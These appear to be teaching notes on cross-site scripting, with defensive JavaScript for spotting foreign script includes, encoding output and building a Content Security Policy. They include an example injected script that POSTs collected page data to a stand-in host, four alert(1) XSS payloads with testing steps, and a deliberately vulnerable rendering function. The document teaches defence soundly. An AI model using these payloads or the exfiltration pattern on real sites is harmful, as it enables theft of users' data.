Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
"Cross-site scripting (XSS) involves injecting malicious code into an otherwise safe website. It is usually done through user input that is not sufficiently sanitised before being processed and stored on the server.
Students should be able to interpret fragments of JavaScript related to cross-site scripting."
The malicious code ends up in the page in one of three ways: it was committed to the code base by accident and not caught because there were no code reviews, an internal threat actor inserted it deliberately, or an SQL/XSS injection vulnerability was exploited to insert it. Students should be able to identify that a script referring to a foreign context (a domain the site does not control) has been executed, or that a POST request has been made to an unknown URL.
<html>
<head>
<title>Welcome to yourWebsite</title>
<link rel="icon" href="http://yourwebsite.com/favicon.png" />
</head>
<body>
<h1>Your Website</h1>
<!-- Either: a script loaded from a foreign origin the site does not control -->
<script src="http://www.randomUrl.com/danger.js"></script>
<!-- Or: an inline script that POSTs data from the page to an unknown URL -->
<script>
// yourData stands for whatever the injected code has collected (form fields, cookies, ...)
const response = fetch("http://www.randomUrl.com", {
  method: "POST",
  headers: {
    "Content-Type": "application/json; charset=UTF-8",
  },
  body: JSON.stringify(yourData),
});
</script>
</body>
</html>
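The two indicators above (a script include from a foreign origin, and a request that sends data to a host the site does not own) can be picked out of page source mechanically. The following is an added example, not code from the original notes: it scans a constructed sample page shaped like the HTML above and reports every script or request whose URL resolves to an origin other than the site's own. The site origin `http://yourwebsite.com`, the hostnames and the function names are assumptions made for the demonstration.

```javascript
// Added example (not from the original notes): scan a page's HTML for the two
// indicators described above, a <script src> pointing at a foreign origin and
// an inline fetch()/XMLHttpRequest call to a host outside the site's own origin.
// The site origin, the sample page and its hostnames are constructed for this demo.
const SITE_ORIGIN = "http://yourwebsite.com"; // assumed origin of the site under review

// Constructed sample page with the same shape as the HTML in the notes.
const SAMPLE_PAGE = `<html>
<head>
<title>Welcome to yourWebsite</title>
<script src="/app.js"></script>
</head>
<body>
<h1>Your Website</h1>
<script src="http://www.randomUrl.com/danger.js"></script>
<script>
const response = fetch("http://www.randomUrl.com", { method: "POST", body: JSON.stringify(yourData) });
</script>
</body>
</html>`;

// True when url (resolved relative to origin) points at a different origin.
function isForeign(url, origin = SITE_ORIGIN) {
  try {
    return new URL(url, origin).origin !== new URL(origin).origin;
  } catch {
    return true; // unparseable URL: treat as suspicious rather than ignoring it
  }
}

// Returns one finding per foreign reference: { kind, url, method }.
function findForeignReferences(html, origin = SITE_ORIGIN) {
  const findings = [];

  // 1. External includes: <script src="...">
  for (const m of html.matchAll(/<script\b[^>]*\ssrc=["']([^"']+)["']/gi)) {
    if (isForeign(m[1], origin)) findings.push({ kind: "external-script", url: m[1], method: "GET" });
  }

  // 2. fetch("...", { method: "..." }) in inline scripts (method defaults to GET)
  for (const m of html.matchAll(/\bfetch\(\s*["']([^"']+)["'](?:\s*,\s*\{([^}]*)\})?/g)) {
    const method = (/method:\s*["'](\w+)["']/.exec(m[2] || "") || [])[1] || "GET";
    if (isForeign(m[1], origin)) findings.push({ kind: "fetch", url: m[1], method: method.toUpperCase() });
  }

  // 3. XMLHttpRequest: xhr.open("POST", "...")
  for (const m of html.matchAll(/\.open\(\s*["'](\w+)["']\s*,\s*["']([^"']+)["']/g)) {
    if (isForeign(m[2], origin)) findings.push({ kind: "xhr", url: m[2], method: m[1].toUpperCase() });
  }
  return findings;
}

// Usage: list what a reviewer should look at on the sample page.
for (const f of findForeignReferences(SAMPLE_PAGE)) {
  console.log(`${f.kind}: ${f.method} ${f.url}`);
}
```

The same-origin test is done with the URL parser rather than string matching so that relative paths such as /app.js count as the site's own, while a different scheme or host counts as foreign. The regular expressions are deliberately simple: they catch the literal patterns in these notes, and obfuscated code (URLs built at run time, string concatenation) would need a browser-side check of the actual requests instead.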
To try these payloads (only on a site you are authorised to test), paste them into an input field, or into a query parameter after the URL in the address bar, then look at the page source or the DOM to see whether they were reflected back or stored verbatim in the HTML and whether the alert fires. The <img> payload relies on src=x failing to load so that its onerror handler runs; the <svg> and <iframe> variants show that the word "script" is not needed at all, so filters that only look for <script> tags are not enough.
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
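Whether any of these payloads fires depends on the server dropping user input straight into the HTML it sends back. The following added example (not code from the original notes) shows that sink beside its fixed form: renderGreetingUnsafe() echoes a name verbatim, so every payload above survives into the page, while renderGreetingSafe() HTML-encodes the input first, so the same payloads are displayed as text. The function names and the containsActiveContent() check are this example's own constructions.

```javascript
// Added example (not part of the original notes): the kind of reflected-XSS sink
// that lets the payloads above run, beside the hardened version. renderGreetingUnsafe()
// drops user input straight into HTML; renderGreetingSafe() HTML-encodes it first.
// Function names are this example's own choices.

// The four payloads from the notes (constructed test input).
const XSS_PAYLOADS = [
  "<script>alert(1)</script>",
  "<img src=x onerror=alert(1)>",
  "<svg onload=alert(1)>",
  '<iframe src="javascript:alert(1)"></iframe>',
];

// VULNERABLE: a "hello, <name>" page that echoes a query parameter back verbatim.
function renderGreetingUnsafe(name) {
  return `<h1>Hello ${name}</h1>`;
}

// Encode the five characters that can break out of an HTML text or quoted
// attribute context. This is output encoding for HTML only; data placed inside
// a <script> block or a URL needs the encoding for that context instead.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: same page, but the input is encoded before it reaches the HTML.
function renderGreetingSafe(name) {
  return `<h1>Hello ${escapeHtml(name)}</h1>`;
}

// Rough static check used only in this demo: does the HTML still contain a tag
// that can execute script, or an inline event handler? (A real test loads the
// page in a browser and watches for the alert.)
function containsActiveContent(html) {
  return /<(script|img|svg|iframe)\b/i.test(html) || /<\w+[^>]*\bon\w+\s*=/i.test(html);
}

for (const payload of XSS_PAYLOADS) {
  console.log("unsafe:", containsActiveContent(renderGreetingUnsafe(payload)),
              "safe:", containsActiveContent(renderGreetingSafe(payload)));
}
```

Note that escapeHtml() does not remove anything: the text "<svg onload=alert(1)>" still reaches the user's screen, but as the characters &lt;svg onload=alert(1)&gt;, which the browser renders rather than executes. That is the difference between sanitising (trying to strip bad input, which the payload list shows is hard to do completely) and encoding output for the context it is placed in.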
- Regular code reviews, so that accidental or deliberate changes to the code base are caught before they reach production.
- Only known and secure third-party libraries should be externally linked. Preferably, after a code review, third-party libraries should be served locally, pinned to the reviewed version, rather than loaded from a remote URL that someone else controls.
- Monitor third-party libraries for known vulnerabilities and, on discovery, patch them.
- Implement defensive data handling: validate input on the server, and encode output for the context it is placed in (HTML body, attribute, JavaScript string, URL) so that user data is displayed as text rather than interpreted as markup or script.
- Declare the language: <html lang="en"> (good practice, though not an XSS control on its own).
- Declare the charset: <meta charset="utf-8">. Without an explicit charset the browser may guess the encoding, and a mis-detected encoding can let characters such as < and > slip past filters that were applied to the bytes the server thought it was sending.
- Implement a Content Security Policy (CSP). A CSP does not block <svg> or <script> tags as such; it tells the browser which origins scripts may be loaded from and, unless 'unsafe-inline' is allowed, refuses inline <script> blocks, inline event handlers such as onload= and onerror=, and javascript: URLs. That is exactly what the <script>, <svg>, <img> and <iframe> payloads above rely on, so a strict script-src stops them from executing even if the encoding step is missed.
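The following added example (not code from the original notes) builds a Content-Security-Policy header for yourwebsite.com and includes a deliberately simplified checker that shows which of the scripts in these notes the policy would let run. Real browsers apply the full CSP matching rules (wildcards, schemes, nonces, hashes, strict-dynamic); the checker here understands only 'self', 'unsafe-inline' and plain host sources, which is enough to see the effect on the examples above. The page origin, host names and function names are assumptions made for the demonstration.

```javascript
// Added example (not from the original notes): build a Content-Security-Policy
// header and a simplified checker showing what it would allow. Real browsers
// implement the full CSP matching rules; this handles only 'self',
// 'unsafe-inline' and host sources. Hostnames and function names are assumed.
const PAGE_ORIGIN = "http://yourwebsite.com"; // assumed origin of the protected site

// Scripts may load only from our own origin (plus any vetted extra sources);
// with no 'unsafe-inline', inline <script> blocks, on*= handlers and javascript:
// URLs are refused by the browser. Send it as:
//   res.setHeader("Content-Security-Policy", buildCsp());
function buildCsp(extraScriptSources = []) {
  const scriptSrc = ["'self'", ...extraScriptSources].join(" ");
  return [
    "default-src 'self'",
    `script-src ${scriptSrc}`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join("; ");
}

// Return the source list of one directive, or null if it is absent.
function parseDirective(csp, name) {
  const directive = csp
    .split(";")
    .map((s) => s.trim())
    .find((s) => s.startsWith(name + " "));
  return directive ? directive.slice(name.length).trim().split(/\s+/) : null;
}

// Would this script run under the policy? src === null means an inline script
// or inline event handler; otherwise src is the URL from <script src>.
function scriptAllowed(csp, src, pageOrigin = PAGE_ORIGIN) {
  const sources = parseDirective(csp, "script-src") || parseDirective(csp, "default-src") || ["*"];
  if (src === null) return sources.includes("'unsafe-inline'");
  const target = new URL(src, pageOrigin);
  return sources.some((source) => {
    if (source === "'self'") return target.origin === new URL(pageOrigin).origin;
    if (source === "*") return true;
    if (source.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes
    // Host source such as cdn.example.com or https://cdn.example.com (simplified:
    // real CSP also matches wildcards, ports and scheme upgrades).
    const hostSource = source.includes("://") ? source : "http://" + source;
    return new URL(hostSource).host === target.host;
  });
}

// Usage: check the scripts from the notes against the policy.
const headerValue = buildCsp();
console.log(headerValue);
console.log("danger.js allowed:", scriptAllowed(headerValue, "http://www.randomUrl.com/danger.js"));
console.log("own /app.js allowed:", scriptAllowed(headerValue, "/app.js"));
console.log("inline <script>/onload allowed:", scriptAllowed(headerValue, null));
```

Under this policy the <script src="http://www.randomUrl.com/danger.js"> include is refused because its origin is not 'self', and the inline exfiltration script, the <svg onload> and <img onerror> handlers and the javascript: iframe are all refused because nothing in script-src permits inline code. CSP is a second line of defence behind output encoding, not a replacement for it: it does not stop injected HTML from altering the page, only from running script.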